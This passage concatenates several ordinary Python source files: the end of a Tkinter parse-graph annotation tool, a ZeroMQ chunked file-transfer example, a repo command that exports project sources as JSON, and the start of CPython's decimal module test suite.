self.category = Category(self.model.default_restriction.name, props, ())
for index in range(len(self.graph.tokens)):
self.graph.set_phrase_category(index, self.category)
self.category_readout.set('Category', self.category)
class GraphVisualizationFrame(Frame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._graph = BuildGraph() # type: Union[BuildGraph, ParseGraph]
self.photo_image = None
self.resize_condition = threading.Condition()
self.resize_request = True
self.resize_thread = threading.Thread(target=self._resize_thread, daemon=True)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.vertical_scrollbar = Scrollbar(self, orient=VERTICAL)
self.vertical_scrollbar.grid(row=0, column=1, sticky='nse')
self.horizontal_scrollbar = Scrollbar(self, orient=HORIZONTAL)
self.horizontal_scrollbar.grid(row=1, column=0, sticky='wes')
self.canvas = Canvas(self, width=300, height=300,
xscrollcommand=self.horizontal_scrollbar.set,
yscrollcommand=self.vertical_scrollbar.set,
background='white')
self.canvas.grid(row=0, column=0, sticky='news')
self.vertical_scrollbar.config(command=self.canvas.yview)
self.horizontal_scrollbar.config(command=self.canvas.xview)
self.canvas.bind("<Configure>", self.resize_canvas)
self.resize_thread.start()
@property
def graph(self) -> Union[BuildGraph, ParseGraph]:
return self._graph
@graph.setter
def graph(self, graph: Union[BuildGraph, ParseGraph]):
self._graph = graph
self.refresh()
def refresh(self):
if not self._graph:
self.canvas.delete("IMG")
return
width = self.canvas.winfo_width()
height = self.canvas.winfo_height()
if width <= 0 or height <= 0:
return
height_pixels_per_mm = self.canvas.winfo_screenheight() / self.canvas.winfo_screenmmheight()
height_pixels_per_inch = height_pixels_per_mm * MM_PER_INCH
height_inches = (height / height_pixels_per_inch)
width_pixels_per_mm = self.canvas.winfo_screenwidth() / self.canvas.winfo_screenmmwidth()
width_pixels_per_inch = width_pixels_per_mm * MM_PER_INCH
width_inches = (width / width_pixels_per_inch)
gv_graph = Digraph()
gv_graph.graph_attr.update(size="%s,%s" % (width_inches / 2, height_inches / 2),
ratio="expand",
dpi=str(2 * max(height_pixels_per_mm, width_pixels_per_inch)))
self._graph.visualize(gv_graph)
image_data = gv_graph.pipe(format='png')
original = PIL.Image.open(BytesIO(image_data))
if width / height < original.width / original.height:
size = (width, int(width / original.width * original.height))
else:
size = (int(height / original.height * original.width), height)
if any(value <= 0 for value in size):
return
resized = original.resize(size, PIL.Image.ANTIALIAS)
self.photo_image = PhotoImage(resized)
self.canvas.delete("IMG")
self.canvas.create_image(0, 0, image=self.photo_image, anchor='nw', tags="IMG")
# noinspection PyUnusedLocal
def resize_canvas(self, event):
with self.resize_condition:
self.resize_request = True
self.resize_condition.notify()
def _resize_thread(self):
while True:
requested = False
with self.resize_condition:
if self.resize_request:
requested = True
self.resize_request = False
else:
self.resize_condition.wait()
if requested:
try:
self.refresh() # TODO: Why are we getting a runtime error?
except RuntimeError:
traceback.print_exc()
class AnnotationFrame(Frame):
def __init__(self, parent, model, settings, utterances: Sequence[str], on_accept, on_reject,
on_modify, *args, **kwargs):
super().__init__(parent, *args, **kwargs)
self.model = model
self.settings = settings
self._utterance_index = None
self._utterance = None
self._graph = BuildGraph()
self.utterances = utterances
self.on_accept = on_accept
self.on_reject = on_reject
self.on_modify = on_modify
# Frames
self.header_frame = Frame(self, relief='groove', borderwidth=1)
self.header_frame.grid(row=0, column=0, sticky='nwe')
self.middle_frame = Frame(self)
self.middle_frame.grid(row=1, column=0, sticky='news')
self.left_frame = Frame(self.middle_frame, relief='groove', borderwidth=1)
self.left_frame.grid(row=0, column=0, sticky='wnse')
self.right_frame = Frame(self.middle_frame, relief='groove', borderwidth=1)
self.right_frame.grid(row=0, column=1, sticky='ensw')
self.footer_frame = Frame(self, relief='groove', borderwidth=1)
self.footer_frame.grid(row=2, column=0, sticky='s')
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self.header_frame.columnconfigure(0, weight=1)
self.middle_frame.rowconfigure(0, weight=1)
self.middle_frame.columnconfigure(0, weight=1)
self.middle_frame.columnconfigure(1, weight=10)
for frame in self.left_frame, self.right_frame:
frame.rowconfigure(0, weight=1)
frame.columnconfigure(0, weight=1)
# Header
self.readout_frame = ReadoutFrame(self.header_frame,
['Annotation Set', 'Utterance List', 'Utterance',
'Annotation'])
self.readout_frame.grid(row=0, column=0, sticky='we')
# Right
self.visualization_frame = GraphVisualizationFrame(self.right_frame)
self.visualization_frame.grid(row=0, column=0, sticky='news')
# Left
self.editing_frame = GraphEditingFrame(self.left_frame, model,
graph_change_callback=self.on_graph_change)
self.editing_frame.grid(row=0, column=0, sticky='news')
# Footer
self.first_button = Button(self.footer_frame, text='<<', state='disabled',
command=self.go_to_first)
self.first_button.grid(row=0, column=0, sticky='n')
self.previous_button = Button(self.footer_frame, text='<', state='disabled',
command=self.go_to_previous)
self.previous_button.grid(row=0, column=1, sticky='n')
self.reset_button = Button(self.footer_frame, text='Reset', state='disabled',
command=self.reset_graph)
self.reset_button.grid(row=0, column=2, sticky='n')
self.reject_button = Button(self.footer_frame, text='Reject', state='disabled',
command=self.reject)
self.reject_button.grid(row=0, column=3, sticky='n')
self.accept_button = Button(self.footer_frame, text='Accept', state='disabled',
command=self.accept)
self.accept_button.grid(row=0, column=4, sticky='n')
self.next_button = Button(self.footer_frame, text='>', state='disabled',
command=self.go_to_next)
self.next_button.grid(row=0, column=5, sticky='n')
self.last_button = Button(self.footer_frame, text='>>', state='disabled',
command=self.go_to_last)
self.last_button.grid(row=0, column=6, sticky='n')
self.go_to_first()
@property
def utterance(self) -> str:
return self._utterance
@utterance.setter
def utterance(self, utterance: str) -> None:
self._utterance = utterance
self.readout_frame.set('Utterance', utterance)
forests = Parser(self.model).parse(utterance,
timeout=time.time() + self.settings['timeout'])[0]
if forests and not forests[0].has_gaps():
graphs = tuple(forests[0].get_parse_graphs())
combined_graph = BuildGraph.from_parse_graphs(graphs)
else:
combined_graph = BuildGraph()
for spelling, _, _ in self.model.tokenizer.tokenize(utterance):
combined_graph.append_token(spelling)
for index in range(len(combined_graph.tokens)):
combined_graph.clear_token_category(index) # Not interested in these...
for index in combined_graph.find_roots():
category = combined_graph.get_phrase_category(index)
props = (self.model.default_restriction.positive_properties &
category.positive_properties)
revised_category = Category(self.model.default_restriction.name, props, ())
combined_graph.set_phrase_category(index, revised_category)
self._graph = combined_graph
self.editing_frame.graph = combined_graph
self.visualization_frame.graph = combined_graph
self.on_graph_change()
self.reset_button['state'] = 'normal'
@property
def graph(self) -> BuildGraph:
return self._graph
def reset_graph(self):
self.utterance = self.utterance
def go_to(self, index):
self._utterance_index = index
if self.utterances:
self.utterance = self.utterances[self._utterance_index]
back_enabled = self.utterances and self._utterance_index > 0
forward_enabled = self.utterances and self._utterance_index < len(self.utterances) - 1
self.first_button['state'] = 'normal' if back_enabled else 'disabled'
self.previous_button['state'] = 'normal' if back_enabled else 'disabled'
self.next_button['state'] = 'normal' if forward_enabled else 'disabled'
self.last_button['state'] = 'normal' if forward_enabled else 'disabled'
def go_to_first(self):
self.go_to(0)
def go_to_previous(self):
if self.utterances and self._utterance_index > 0:
self.go_to(self._utterance_index - 1)
def go_to_next(self):
if self.utterances and self._utterance_index < len(self.utterances) - 1:
self.go_to(self._utterance_index + 1)
def go_to_last(self):
if self.utterances:
self.go_to(len(self.utterances) - 1)
def accept(self):
if self.on_accept:
self.on_accept(self._utterance_index, self._utterance, self._graph,
self.readout_frame.get('Annotation'))
self.go_to_next()
def reject(self):
if self.on_reject:
self.on_reject(self._utterance_index, self._utterance, self._graph,
self.readout_frame.get('Annotation'))
self.go_to_next()
def on_graph_change(self):
self.editing_frame.refresh()
self.visualization_frame.refresh()
annotations = self.graph.get_annotations()
annotation_string = ('[%s]' % '] ['.join(annotations)) if annotations else ''
self.readout_frame.set('Annotation', annotation_string)
self.accept_button['state'] = ('normal' if self.on_accept and self._graph.is_tree()
else 'disabled')
self.reject_button['state'] = 'normal' if self.on_reject else 'disabled'
if self.on_modify:
self.on_modify(self._utterance_index, self._utterance, self._graph, annotation_string)
class AnnotatorApp(Tk):
def __init__(self, model, save_path, utterances, *args, **kwargs):
super().__init__(*args, **kwargs)
# self.wm_minsize(400, 400)
# self.size = (400, 400)
self.model = model
self.settings = {'timeout': 5}
self.utterances = list(utterances) if utterances else []
self.annotation_database = dbm.open(save_path, 'c')
self.protocol("WM_DELETE_WINDOW", self.close)
self.file_access_lock = threading.RLock()
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
# TODO: This is a kludge. We lie to the frame about having utterances until after we can
# grab the window size, below.
self.annotation_frame = AnnotationFrame(self, model, self.settings, [], self.accept,
self.reject, self.modify)
self.annotation_frame.grid(row=0, column=0, sticky='news')
self.text_box = Text(self, height=1)
self.text_box.grid(row=1, column=0, sticky='news')
self.text_box.bind('<Return>', self.submit)
self.text_box.focus_set()
# TODO: This feels kludgy. What's a better way?
# Capture the size of the window just after everything has been initialized, and set it to
# the minimum size.
threading.Timer(1, self._init_callback).start()
def close(self):
if self.annotation_database is not None:
self.annotation_database.close()
self.annotation_database = None
try:
self.destroy()
except TclError:
pass
def __del__(self):
self.close()
super().__del__()
def _init_callback(self):
self.wm_minsize(self.winfo_width(), self.winfo_height())
self.annotation_frame.utterances = self.utterances
self.annotation_frame.go_to_first()
# noinspection PyUnusedLocal
def submit(self, event):
text = self.text_box.get(1.0, END).strip()
self.text_box.delete(1.0, END)
if text:
self.utterances.append(text)
self.annotation_frame.go_to_last()
return 'break'
# noinspection PyUnusedLocal
def accept(self, utterance_index, utterance, graph, annotation):
result = {
'utterance': utterance,
'annotation': annotation,
'graph': graph.to_json(),
'status': 'accepted',
}
encoded_utterance = utterance.encode()
compressed_result = bz2.compress(json.dumps(result, sort_keys=True).encode())
with self.file_access_lock:
self.annotation_database[encoded_utterance] = compressed_result
# noinspection PyUnusedLocal
def reject(self, utterance_index, utterance, graph, annotation):
result = {
'utterance': utterance,
'annotation': annotation,
'graph': graph.to_json(),
'status': 'rejected',
}
encoded_utterance = utterance.encode()
compressed_result = bz2.compress(json.dumps(result, sort_keys=True).encode())
with self.file_access_lock:
self.annotation_database[encoded_utterance] = compressed_result
# noinspection PyUnusedLocal
def modify(self, utterance_index, utterance, graph, annotation):
result = {
'utterance': utterance,
'annotation': annotation,
'graph': graph.to_json()
}
encoded_utterance = utterance.encode()
with self.file_access_lock:
if encoded_utterance in self.annotation_database:
status = json.loads(
bz2.decompress(self.annotation_database[encoded_utterance]).decode()
).get('status')
else:
status = None
result['status'] = status
self.annotation_database[utterance.encode()] = \
bz2.compress(json.dumps(result, sort_keys=True).encode())
# TODO: Make the app support choosing a model instead of assuming English.
def main():
from pyramids_english.convenience import PARSER
model = PARSER.model
with open(r'/home/hosford42/PycharmProjects/NLU/Data/sentences.txt', encoding='utf-8') as file:
utterances = {line.strip() for line in file if line.strip()}
print("Loaded", len(utterances), "utterances...")
# TODO: We shouldn't have to prime the parser by calling it. Make an initialize() method, or do
# it in __init__.
PARSER.parse("hello") # Prime the parser to make sure categories and properties are all loaded.
app = AnnotatorApp(model, '~/PycharmProjects/NLU/Data/annotations.dbm',
utterances)
app.settings['timeout'] = 10
app.mainloop()
if __name__ == '__main__':
main()
|
fileio3.py
|
# File Transfer model #2
#
# In which the client requests each chunk individually, thus
# eliminating server queue overflows, but at a cost in speed.
from __future__ import print_function
import os
from threading import Thread
import zmq
from zhelpers import socket_set_hwm, zpipe
CHUNK_SIZE = 250000
PIPELINE = 10
def client_thread(ctx, pipe):
dealer = ctx.socket(zmq.DEALER)
socket_set_hwm(dealer, PIPELINE)
dealer.connect("tcp://127.0.0.1:6000")
credit = PIPELINE # Up to PIPELINE chunks in transit
total = 0 # Total bytes received
chunks = 0 # Total chunks received
offset = 0 # Offset of next chunk request
while True:
while credit:
# ask for next chunk
dealer.send_multipart([
b"fetch",
b"%i" % offset,
b"%i" % CHUNK_SIZE,
])
offset += CHUNK_SIZE
credit -= 1
try:
chunk = dealer.recv()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
return # shutting down, quit
else:
raise
chunks += 1
credit += 1
size = len(chunk)
total += size
if size < CHUNK_SIZE:
break # Last chunk received; exit
print ("%i chunks received, %i bytes" % (chunks, total))
pipe.send(b"OK")
# The rest of the code is exactly the same as in model 2, except
# that we set the HWM on the server's ROUTER socket to PIPELINE
# to act as a sanity check.
# .skip
def server_thread(ctx):
file = open("testdata", "rb")
router = ctx.socket(zmq.ROUTER)
socket_set_hwm(router, PIPELINE)
router.bind("tcp://*:6000")
while True:
# First frame in each message is the sender identity
# Second frame is "fetch" command
try:
msg = router.recv_multipart()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
return # shutting down, quit
else:
raise
identity, command, offset_str, chunksz_str = msg
assert command == b"fetch"
offset = int(offset_str)
chunksz = int(chunksz_str)
# Read chunk of data from file
file.seek(offset, os.SEEK_SET)
data = file.read(chunksz)
# Send resulting chunk to client
router.send_multipart([identity, data])
# The main task is just the same as in the first model.
# .skip
def main():
# Start child threads
ctx = zmq.Context()
a,b = zpipe(ctx)
client = Thread(target=client_thread, args=(ctx, b))
server = Thread(target=server_thread, args=(ctx,))
client.start()
server.start()
# loop until client tells us it's done
try:
print (a.recv())
except KeyboardInterrupt:
pass
del a,b
ctx.term()
if __name__ == '__main__':
main()
|
dumpjson.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from pyversion import is_python3
if is_python3():
import http.cookiejar as cookielib
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
else:
import imp
import urllib2
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import sys
import json
from command import Command, MirrorSafeCommand
def _fetch_revs(p, sem):
with sem:
p.rev = p._LsRemote(p.revisionExpr).split('\t')[0]
class Dumpjson(Command, MirrorSafeCommand):
common = True
helpSummary = "Export json file with sources"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
"""
def Execute(self, opt, args):
all_projects = self.GetProjects(args, missing_ok=True, submodules_ok=False)
MAX_THREADS = 8
sem = _threading.Semaphore(MAX_THREADS)
threads = [ _threading.Thread(target=_fetch_revs, args=(p, sem)) for p in all_projects ]
for t in threads:
t.start()
for t in threads:
t.join()
data = {
p.name: {
"url": p.remote.url,
"relpath": p.relpath,
"groups": sorted(p.groups),
"revisionExpr": p.revisionExpr,
"rev": p.rev,
"linkfiles": [
{ "src_rel_to_dest": l.src_rel_to_dest,
"dest": l.dest,
}
for l in p.linkfiles
],
"copyfiles": [
{ "src": c.src,
"dest": c.dest,
}
for c in p.copyfiles
],
}
for p in all_projects
};
print(json.dumps(data, sort_keys=True))
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings,
requires_legacy_unicode_capi)
from test.support import (TestFailed,
run_with_locale, cpython_only,
darwin_malloc_err_warning)
from test.support.import_helper import import_fresh_module
from test.support import warnings_helper
import random
import inspect
import threading
import sysconfig
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
ADDRESS_SANITIZER = (
'-fsanitize=address' in _cflags
)
if sys.platform == 'darwin':
darwin_malloc_err_warning('test_decimal')
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
import decimal as orig_sys_decimal
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file, encoding="utf-8") as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
